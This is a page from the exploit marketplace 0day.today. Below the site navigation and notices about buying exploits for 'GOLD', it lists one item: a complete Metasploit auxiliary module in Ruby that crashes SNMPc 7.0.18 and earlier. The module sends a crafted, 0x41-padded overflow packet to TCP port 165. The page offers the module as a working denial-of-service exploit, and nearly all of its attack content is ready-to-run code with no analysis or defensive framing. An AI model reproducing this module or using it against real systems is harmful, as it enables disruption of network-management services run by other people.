0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SNMPc <= 7.0.18 Remote Denial of Service Exploit (meta)
======================================================= SNMPc <= 7.0.18 Remote Denial of Service Exploit (meta) ======================================================= ## # $Id: snmpc.rb 2007-06-03 $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## require 'msf/core' module Msf class Auxiliary::Dos::Windows::Snmpc < Msf::Auxiliary include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'SNMPc ', 'Description' => %q{ This module sends a specially-crafted packet to the service login of snmpc causing a denial of service of snmpc. }, 'Author' => [ 'En Douli, Tks to OaiTeam <DouliEn@gmail.com>' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 1 $', 'References' => [ [ 'CVE', 'XXXXXXX' ], ])) register_options([Opt::RPORT(165),], self.class) end def run connect init = "\x14\x00\x00\x00\x70\xa9\x00\x00\x51\x03\x00\x00\x02\x00\x00\x00\x72\x63\x6f\x6e" pkt = "\x29\x00\x00\x00\xbc\xee\x00\x00\x52\x03\x00\x00\x02\x00\x00\x00\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74" pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" * 56 pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x09" pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" * 35 pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x09\x30\x00" print_status("Sending dos packet ... ") sock.put(init) sock.put(pkt) disconnect end end end # 0day.today [2024-07-07] #